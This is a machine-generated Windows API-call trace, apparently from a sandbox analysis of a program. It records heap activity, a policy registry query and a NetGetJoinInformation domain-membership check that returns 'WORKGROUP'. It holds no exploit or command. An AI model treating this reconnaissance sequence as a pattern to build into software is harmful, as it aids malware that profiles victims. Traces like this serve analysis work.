RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7b41c8 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4130 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af288 | out: hHeap=0x770000) returned 1 [0027.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af288 [0027.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0027.375] CharUpperBuffW (in: lpsz="HKLM64", cchLength=0x6 | out: lpsz="HKLM64") returned 0x6 [0027.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889478 [0027.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af308 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889478 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af308 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af288 | out: hHeap=0x770000) returned 1 [0027.375] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x20119, phkResult=0x6af0b0 | out: phkResult=0x6af0b0*=0x134) returned 0x0 [0027.375] RegQueryValueExW (in: hKey=0x134, lpValueName="EnableLinkedConnections", lpReserved=0x0, lpType=0x6af0bc, lpData=0x0, lpcbData=0x6af0ac*=0x0 | out: lpType=0x6af0bc*=0x0, lpData=0x0, lpcbData=0x6af0ac*=0x0) returned 0x2 [0027.375] RegCloseKey (hKey=0x134) returned 0x0 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b41c8 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af518 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d60 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2b8 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894a8 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892e0 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b08 | out: hHeap=0x770000) returned 1 [0027.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2e8 | out: hHeap=0x770000) returned 1 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2e8 [0027.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b30 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892e0 [0027.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889418 | out: hHeap=0x770000) returned 1 [0027.376] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2b8 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4e8 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c20 [0027.376] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0027.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c20 | out: hHeap=0x770000) returned 1 [0027.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889418 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2a8 [0027.376] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0027.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c20 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894a8 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4e8 [0027.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894a8 | out: hHeap=0x770000) returned 1 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894a8 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c48 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af518 [0027.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4478 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b80 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d60 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af288 [0027.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d60 | out: hHeap=0x770000) returned 1 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b44b0 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d60 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ba8 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af308 [0027.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b44e8 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0027.377] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0bf8 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af278 [0027.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0bd0 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889478 [0027.377] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2a8 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0027.377] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0027.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0027.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8894d8 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d48 [0027.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0027.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0027.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c98 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0027.378] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 0 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0cc0 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af358 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0027.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891a8 [0027.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889448 [0027.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889460 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0027.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889520 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0027.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889568 [0027.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889580 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889598 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895b0 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895e0 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895f8 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0027.379] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889640 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af328 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889658 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889640 | out: hHeap=0x770000) returned 1 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af328 | out: hHeap=0x770000) returned 1 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889658 | out: hHeap=0x770000) returned 1 [0027.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889658 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af328 [0027.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889640 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889658 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af328 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889640 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889640 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af328 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af388 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889658 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889640 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af328 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889658 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af388 | out: hHeap=0x770000) returned 1 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af388 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889658 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af328 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af398 [0027.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889640 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889658 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af328 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889640 | out: hHeap=0x770000) returned 1 [0027.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af398 | out: hHeap=0x770000) returned 1 [0027.380] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x742f0000 [0028.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0028.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af398 [0028.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0028.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16) returned 0x7ae788 [0028.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x7ae788, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0028.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0028.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0dd8 [0028.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae788 | out: hHeap=0x770000) returned 1 [0028.868] GetProcAddress (hModule=0x742f0000, lpProcName="NetGetJoinInformation") returned 0x74292c3f [0028.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0dd8 | out: hHeap=0x770000) returned 1 [0028.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af398 | out: hHeap=0x770000) returned 1 [0028.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0dd8 [0028.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af398 [0028.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af328 [0028.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3a8 [0028.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20002) returned 0x88ffb0 [0028.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af398 | out: hHeap=0x770000) returned 1 [0028.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af328 | out: hHeap=0x770000) returned 1 [0028.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3a8 | out: hHeap=0x770000) returned 1 [0028.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0dd8 | out: hHeap=0x770000) returned 1 [0028.869] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x6ae4c0, BufferType=0x6ae4d8 | out: lpNameBuffer=0x6ae4c0*="WORKGROUP", BufferType=0x6ae4d8) returned 0x0 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7d08 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898f8 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0028.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0028.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0028.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898f8 | out: hHeap=0x770000) returned 1 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898f8 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0028.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889940 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0028.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0028.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0028.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0028.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0028.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0028.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0028.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0028.886] FreeLibrary (hLibModule=0x742f0000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af388 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891a8 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889448 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889460 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889520 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889568 | out: hHeap=0x770000) returned 1 [0028.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 